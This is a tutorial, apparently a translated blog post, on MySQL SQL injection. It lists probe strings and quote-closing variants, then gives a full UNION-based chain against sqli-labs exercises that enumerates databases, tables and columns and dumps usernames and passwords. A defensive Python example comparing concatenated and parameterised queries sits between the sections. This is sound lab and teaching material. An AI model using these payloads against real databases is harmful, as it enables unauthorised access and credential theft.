Simple SQL injection summary (Part 1)
0x01
(1) Injection categories: opinions differ on how to classify them, so they are not covered here.
(2) System functions
Several commonly used functions:
- version() - system version;
- database() - database name;
- user() - database user name;
- @@datadir - database path;
- @@version_compile_os - operating system version;
(3) String concatenation functions
- concat(str1, str2, ...) - joins the strings with no delimiter;
- concat_ws('separator', str1, str2, ...) - joins the strings with the given delimiter;
- group_concat(str1, str2, ...) - joins all the strings in a group, separated by commas.
A detailed understanding is not needed; it is enough to know that these three functions can return all of the content at once, on a single line.
(4) Statements commonly used for probing
or 1=1#
'or 1=1#
''or 1=1#
)or 1=1#
')or 1=1#
'')or 1=1#
''))or 1=1#
(5) Comments
--+, #, /**/ etc.
To sum up
In fact, a SQL injection consists of just two parts: the first is closing the original MySQL statement; the second is executing the newly constructed statement.
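Added example (not part of the original post): a Python/sqlite3 sketch of the "close the statement" step from the defender's side. It shows a concatenated query being rewritten by a probe from (4), and the same probe staying inert when the value is bound as a parameter. The table, sample rows and function names are constructed for illustration, and SQLite stands in for MySQL, so the -- comment form is used (# is MySQL-specific).

```python
import sqlite3
from urllib.parse import unquote_plus

def make_db():
    # Constructed sample data; schema and rows are assumptions for this example.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [(1, "alice", "pw1"), (2, "bob", "pw2"), (3, "carol", "pw3")])
    return db

def decode_param(raw):
    # In a URL query string "+" is an encoded space, so "--+" arrives as "-- ".
    return unquote_plus(raw)

def build_concat_query(user_id):
    # Vulnerable pattern: the request value is pasted between the quotes.
    return "SELECT username FROM users WHERE id='" + user_id + "' LIMIT 0,1"

def lookup_concat(db, user_id):
    return [row[0] for row in db.execute(build_concat_query(user_id))]

def lookup_bound(db, user_id):
    # Hardened pattern: the value is bound as data and never parsed as SQL.
    sql = "SELECT username FROM users WHERE id=? LIMIT 0,1"
    return [row[0] for row in db.execute(sql, (user_id,))]

def lookup_validated(db, user_id):
    # Defence in depth: reject anything that is not a plain decimal id.
    if not (user_id.isascii() and user_id.isdigit()):
        raise ValueError("id must be numeric")
    return lookup_bound(db, user_id)

if __name__ == "__main__":
    db = make_db()
    probe = decode_param("' or 1=1 --+")
    # The quote closes the literal; the comment swallows "' LIMIT 0,1".
    print(build_concat_query(probe))
    print("concatenated:", lookup_concat(db, probe))
    print("bound       :", lookup_bound(db, probe))
    print("bound, id=2 :", lookup_bound(db, "2"))
```

The concatenated lookup returns every user because the WHERE clause becomes always true, while the bound lookup compares the whole probe string against id and matches nothing.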
0x02 Various injection methods and their processes
(1) Ordinary injection: sqli-labs (Less 1-4)
# Injection point
-1' union select 1,2,3--+
# Enumerate databases
-1' union select 1,group_concat(schema_name),3 from information_schema.schemata--+
# Enumerate tables
-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+
# Enumerate columns
-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+
# Dump data
-1' union select 1,username,password from users where id=2--+
For the following levels the SQL statements executed are the same, so they are not repeated here; only the way the statement is closed differs. The closings that inject successfully are listed directly:
or 1=1
or 1=1 --+
') or '1'=('1'
) or 1=1 --+
") or "1"=("1
") or 1=1 --+
(2) Blind injection
When the front-end page does not echo the result of the injected statement, it is called blind injection.